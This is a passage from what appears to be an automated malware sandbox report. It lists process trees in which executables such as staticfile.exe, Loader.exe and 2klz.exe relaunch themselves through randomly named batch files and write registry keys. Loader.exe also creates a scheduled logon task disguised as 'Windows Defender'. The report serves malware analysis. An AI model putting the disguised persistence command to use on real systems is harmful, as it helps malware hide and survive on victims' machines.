        PID:1464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oqD6e5Rlo4.bat"
        40⤵
        
        PID:2692
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        41⤵
        
        PID:3348
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        41⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        41⤵
        Modifies registry class
        
        PID:5772
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7ZUpyl1cxR.bat"
        42⤵
        
        PID:716
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        43⤵
        
        PID:2444
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        43⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        43⤵
        
        PID:4804
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nQ6S61kszs.bat"
        44⤵
        
        PID:4380
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        45⤵
        
        PID:2860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        45⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        45⤵
        
        PID:2028
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ege7x4f51h.bat"
        46⤵
        
        PID:4152
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        47⤵
        
        PID:4668
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        47⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        47⤵
        
        PID:3244
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iOQJjcW06d.bat"
        48⤵
        
        PID:5268
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        49⤵
        
        PID:1636
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        49⤵
        
        PID:3616
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        49⤵
        Modifies registry class
        
        PID:4628
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8u3sqlBbV8.bat"
        50⤵
        
        PID:1364
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        51⤵
        
        PID:664
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        51⤵
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        51⤵
        Modifies registry class
        
        PID:5388
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wZZbjSwdQ0.bat"
        52⤵
        
        PID:5344
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        53⤵
        
        PID:2296
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        53⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        53⤵
        
        PID:5608
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mrepg6Tk9m.bat"
        54⤵
        
        PID:4916
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        55⤵
        
        PID:5112
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        55⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        55⤵
        Modifies registry class
        
        PID:4712
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dYHSyFVcIa.bat"
        56⤵
        
        PID:6880
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        57⤵
        
        PID:6940
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        57⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        57⤵
        Modifies registry class
        
        PID:2296
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Gu3WPocxsu.bat"
        58⤵
        
        PID:3600
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        59⤵
        
        PID:5408
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        59⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        59⤵
        
        PID:3732
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZDmqPzi1bE.bat"
        60⤵
        
        PID:7920
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        61⤵
        
        PID:7472
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        61⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7680
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        61⤵
        Modifies registry class
        
        PID:2140
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VW6Uh1R2rX.bat"
        62⤵
        
        PID:6228
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        63⤵
        
        PID:7516
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        63⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        63⤵
        Blocklisted process makes network request
        
        PID:7716
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hPr2ldZzRL.bat"
        64⤵
        
        PID:7452
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        65⤵
        
        PID:7648
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        65⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        65⤵
        Modifies registry class
        
        PID:7596
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1QWUF8ga47.bat"
        66⤵
        
        PID:5344
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        67⤵
        
        PID:7012
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        67⤵
        
        PID:7508
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        67⤵
        
        PID:7876
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0wRVFaeuMa.bat"
        68⤵
        
        PID:5816
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        69⤵
        
        PID:5624
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        69⤵
        Runs ping.exe
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        69⤵
        
        PID:6724
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Q5hzjQRwNJ.bat"
        70⤵
        
        PID:6704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        71⤵
        
        PID:6396
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        71⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:764
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        71⤵
        
        PID:6272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4len57naH7.bat"
        72⤵
        
        PID:8064
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        73⤵
        
        PID:6664
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        73⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        73⤵
        
        PID:8044
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n5TyArTaLh.bat"
        74⤵
        
        PID:3408
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        75⤵
        
        PID:7452
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        75⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8008
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        75⤵
        Modifies registry class
        
        PID:7540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GogtzRNUlL.bat"
        76⤵
        
        PID:7192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        77⤵
        
        PID:4236
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        77⤵
        
        PID:7992
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        77⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7520
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        77⤵
        Modifies registry class
        
        PID:5584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lnXy25yoCy.bat"
        78⤵
        
        PID:8016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        79⤵
        
        PID:7112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        79⤵
        
        PID:8028
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        79⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        79⤵
        
        PID:5608
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\U6Y6MWxFQU.bat"
        80⤵
        
        PID:2340
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        81⤵
        
        PID:8048
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        81⤵
        
        PID:6724
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        81⤵
        
        PID:5532
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fa12eP5s1A.bat"
        82⤵
        
        PID:1896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        83⤵
        
        PID:6660
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        83⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        83⤵
        
        PID:2012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nhkbaghNki.bat"
        84⤵
        
        PID:6644
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        85⤵
        
        PID:5568
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        85⤵
        Runs ping.exe
        
        PID:8136
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        85⤵
        
        PID:5840
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vXp13JMNiQ.bat"
        86⤵
        
        PID:3800
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        87⤵
        
        PID:8108
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        87⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7608
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        87⤵
        
        PID:7240
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\e4kjvfRyFL.bat"
        88⤵
        
        PID:4076
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        89⤵
        
        PID:6528
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        89⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7416
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        89⤵
        
        PID:4260
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\x7DCP4VDR3.bat"
        90⤵
        
        PID:7060
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        91⤵
        
        PID:6100
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        91⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        91⤵
        
        PID:6492
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tpiwJJ3Pd2.bat"
        92⤵
        
        PID:8124
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        93⤵
        
        PID:7960
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        93⤵
        
        PID:8044
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        93⤵
        
        PID:5608
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\04ySO8WbXQ.bat"
        94⤵
        
        PID:7864
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        95⤵
        
        PID:7784
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        95⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        95⤵
        
        PID:7436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EP1yTPiaGq.bat"
        96⤵
        
        PID:8152
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        97⤵
        
        PID:6832
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        97⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        97⤵
        
        PID:6260
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2juDPxCKYX.bat"
        98⤵
        
        PID:4712
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        99⤵
        
        PID:6208
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        99⤵
        
        PID:3376
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        99⤵
        
        PID:6992
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\opqphCX6ar.bat"
        100⤵
        
        PID:6908
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        101⤵
        
        PID:7440
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        101⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        101⤵
        
        PID:7736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YwaRxMoVB5.bat"
        102⤵
        
        PID:7620
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        103⤵
        
        PID:5388
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        103⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7756
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        103⤵
        
        PID:6396
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SbXYQ83spR.bat"
        104⤵
        
        PID:3424
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        105⤵
        
        PID:7040
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        105⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        105⤵
        
        PID:7148
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WBTzkrAkDM.bat"
        106⤵
        
        PID:1684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        107⤵
        
        PID:7376
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        107⤵
        
        PID:6832
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        107⤵
        
        PID:4764
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kbtAGVbC4L.bat"
        108⤵
        
        PID:7472
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        109⤵
        
        PID:5360
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        109⤵
        Runs ping.exe
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\staticfile.exe
        
        "C:\Users\Admin\AppData\Local\staticfile.exe"
        109⤵
        
        PID:7452
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E7ZnFR4Wgx.bat"
        110⤵
        
        PID:7952
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        111⤵
        
        PID:5888
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        111⤵
        
        PID:4508
- C:\Users\Admin\Desktop\Files\Loader.exe
  "C:\Users\Admin\Desktop\Files\Loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:872
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender.exe"' & exit
    3⤵
    PID:1020
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3838.tmp.bat""
    3⤵
    PID:2000
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:6060
  - - C:\Users\Admin\AppData\Roaming\Windows Defender.exe
      "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2764
- C:\Users\Admin\Desktop\Files\2klz.exe
  "C:\Users\Admin\Desktop\Files\2klz.exe"
  2⤵
  - Executes dropped EXE
  PID:3384
- - C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SendNotifyMessage
    PID:2344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rmOMPcVhxMsO.bat" "
      4⤵
      PID:228
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2276
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2360
    - - C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:5760
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\I0r472wHxQ3F.bat" "
        6⤵
        
        PID:4804
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2452
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:5440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ElTzB7jChppQ.bat" "
        8⤵
        
        PID:1896
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:5320
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5396
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:4416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2czNeTAaueuJ.bat" "
        10⤵
        
        PID:1684
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:5544
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1468
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:5596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mMtVsQPVzgdR.bat" "
        12⤵
        
        PID:1900
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:4800
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4548
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:1148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MQiwyAJhd3OV.bat" "
        14⤵
        
        PID:1020
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:5544
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        Runs ping.exe
        
        PID:5436
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:4720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Flx6cjkafrLN.bat" "
        16⤵
        
        PID:3520
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:6068
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4556
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:4336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r47hAS7aPELb.bat" "
        18⤵
        
        PID:4548
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:4628
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        Runs ping.exe
        
        PID:4732
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Z4dQJEVSfHpl.bat" "
        20⤵
        
        PID:484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:1884
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4340
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AuISDtdtvmCq.bat" "
        22⤵
        
        PID:5532
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:4140
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1440
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        
        PID:3248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xv6TCaIlOeYA.bat" "
        24⤵
        
        PID:3492
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:8
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        25⤵
        Runs ping.exe
        
        PID:1988
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0qwxPH72JtEu.bat" "
        26⤵
        
        PID:3368
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:2880
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        27⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of SendNotifyMessage
